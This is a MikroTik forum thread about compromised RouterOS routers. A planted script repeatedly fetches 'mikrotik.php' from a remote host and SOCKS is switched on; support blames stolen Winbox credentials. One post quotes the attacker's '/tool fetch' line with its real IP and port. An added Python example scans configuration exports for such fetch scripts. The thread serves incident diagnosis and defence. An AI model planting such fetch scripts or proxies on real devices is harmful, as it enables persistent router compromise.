prekshapatel
just joined
Topic Author
Posts: 5
Joined: Tue Jul 24, 2018 1:34 pm

fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 1:57 pm

We are observing some fetch:file “mikrotik.php” automatically downloaded in all types of devices, i.e. SXT lite, RB 750 UP, RB 2011UIAS, groove etc.
We see the script added to MikroTik again and again, even after upgrading to the latest version.

 
normis
MikroTik Support
Posts: 24941
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 2:06 pm

Upgrade the device to 6.40.8 or 6.42.6 and change your password. Also improve your network security according to these guides:
https://blog.mikrotik.com
 
prekshapatel
just joined
Topic Author
Posts: 5
Joined: Tue Jul 24, 2018 1:34 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 2:46 pm

Socks is also getting enabled automatically in the devices where this file is getting downloaded. Kindly suggest why this is happening?
 
normis
MikroTik Support
Posts: 24941
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 2:53 pm

Please read above post.
 
crashpunk
just joined
Posts: 10
Joined: Sat Apr 05, 2008 9:36 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 5:33 pm

Normis ... I'm being attacked by this vulnerability. The attack began 17 hours ago, 07/23/2018 16:00 GMT-3. I have installed RouterOS v6.41.3 and the www service disabled, but they have still entered and installed a script.
I think they injected the script from another service, I'm not sure. But I can see the hour.
I'm running a backup and updating to the latest version, but I think the vulnerability is still there. I'm going to deactivate all external services except Winbox for the moment and change the password.
Last edited by crashpunk on Wed Jul 25, 2018 11:04 pm, edited 4 times in total.
 
mrz
MikroTik Support
Posts: 6258
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 5:34 pm

Upgrade to version that is not vulnerable. See details here:
https://blog.mikrotik.com/security/winb ... ility.html
 
msatter
Forum Guru
Posts: 2139
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 7:38 pm

How can that happen? I totally missed the announcement of the blog by Mikrotik.
Loving my freedom and so, no Twitter, no Facebook/Instagram/WhatsApp, no Apple and no Google/Alphabet, no Amazon/Cloudfront/AWS.

Running:
RouterOS 6.49Beta / Winbox 3.27 64bits
 
Jessieblueyu
just joined
Posts: 3
Joined: Tue Jul 24, 2018 11:06 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 11:11 pm

I see the same behavior in my RB951G-2HnD - the log shows that mikrotik.php was downloaded (I see it in the files section - it is a blank php file) followed by a lot of telnet login attempts.

I upgraded to the latest version, changed the telnet and ssh ports.

Results:
No more telnet login attempts present in log.
Downloading of the mikrotik.php file continues (!!!)

What is happening here? How do I stop this?
 
Jessieblueyu
just joined
Posts: 3
Joined: Tue Jul 24, 2018 11:06 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 11:20 pm

I closed the WinBox access from WAN but the downloading of the mikrotik.php continues every 30 seconds exactly.

Any ideas?
 
Jessieblueyu
just joined
Posts: 3
Joined: Tue Jul 24, 2018 11:06 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Tue Jul 24, 2018 11:30 pm

OK I understood now what "they" did:

Somehow they managed to set up a script (created by my user!?) with the following content:

/tool fetch address=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http
Apart from fetching this empty .php file I don't see any other actions anywhere else.

After I removed the script, silent times came back... but this was disturbing...
 
crashpunk
just joined
Posts: 10
Joined: Sat Apr 05, 2008 9:36 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices  [SOLVED]

Tue Jul 24, 2018 11:36 pm

Thank you mrz, fixed problem.
I read in the blog about the attack on the web service. I did not see that the same problem was presented at port 8291 of WinBox.
 
TomosRider
Member Candidate
Posts: 203
Joined: Thu Nov 20, 2014 1:51 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Wed Jul 25, 2018 5:01 pm

Hello guys!
I noticed this problem today. Found malicious script under system/scripts. Remove it.
Upgrading ROS didn't help.
Change your passwords, block port 2008, turn off ip/socks!!!
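
The indicators reported in this thread (a script that calls `/tool fetch`, and SOCKS switched on) can be checked across many devices by scanning saved configuration exports. The following is an added example, not part of any post and not MikroTik code; it assumes the usual `/export` layout of a section path on its own line followed by `add`/`set` lines, and the scheduler check is an assumption, since the thread does not say how the script was re-run.

```python
import re

# Constructed sample shaped like RouterOS "/export" output (not from the thread).
# 192.0.2.10 is a documentation address standing in for the remote host.
SAMPLE_EXPORT = r'''/ip socks
set enabled=yes
/system scheduler
add interval=30s name=schedule1 on-event=script1
/system script
add name=script1 owner=admin source="/tool fetch address=192.0.2.10 port=2008 \
    src-path=/mikrotik.php mode=http"
add name=nightly owner=admin source="/system backup save name=nightly"
'''
FETCH = re.compile(r"/tool\s+fetch\b")

def field(line, key):
    """Return the value of key=value (quoted or bare) from an export line."""
    m = re.search(r'(?:^|\s)%s=("(?:[^"\\]|\\.)*"|\S+)' % re.escape(key), line)
    return m.group(1).strip('"') if m else ""

def audit_export(text):
    """Return sorted (indicator, item) pairs for the signs reported in the thread."""
    # Join lines the export wrapped with a trailing backslash, then track sections.
    section, entries = "", []
    for line in re.sub(r"\\\r?\n[ \t]*", "", text).splitlines():
        line = line.strip()
        if line.startswith("/"):
            section = line
        elif line and not line.startswith("#"):
            entries.append((section, line))
    findings, fetchers = set(), set()
    for section, line in entries:
        if section == "/ip socks" and field(line, "enabled") == "yes":
            findings.add(("socks-enabled", section))
        if section == "/system script" and FETCH.search(line):
            fetchers.add(field(line, "name"))
            findings.add(("script-fetch", field(line, "name")))
    # Assumption: a scheduler entry is what re-runs the script; the thread does
    # not say how the 30-second repeat was configured.
    for section, line in entries:
        event = field(line, "on-event")
        if section == "/system scheduler" and (event in fetchers or FETCH.search(event)):
            findings.add(("scheduled-fetch", field(line, "name")))
    return sorted(findings)

if __name__ == "__main__":
    for indicator, item in audit_export(SAMPLE_EXPORT):
        print(indicator, item)
```

A legitimate script may also use `/tool fetch`, so each hit is a prompt to read the entry, not proof of compromise.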
 
crashpunk
just joined
Posts: 10
Joined: Sat Apr 05, 2008 9:36 pm

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Wed Jul 25, 2018 11:22 pm

Hello guys!
I noticed this problem today. Found malicious script under system/scripts. Remove it.
Upgrading ROS didn't help.
Change your passwords, block port 2008, turn off ip/socks!!!
TomosRider could inject the script after updating RouterOS v6.42.6 ..?
 
normis
MikroTik Support
Posts: 24941
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

Thu Jul 26, 2018 7:53 am

Everyone, the issue is that somebody could have gotten your password a long time ago, through the winbox vulnerability published a few months ago. Even if you have upgraded, they still have your password, they just used it now. So upgrade fixes the vulnerability, but you have to change your password after upgrading.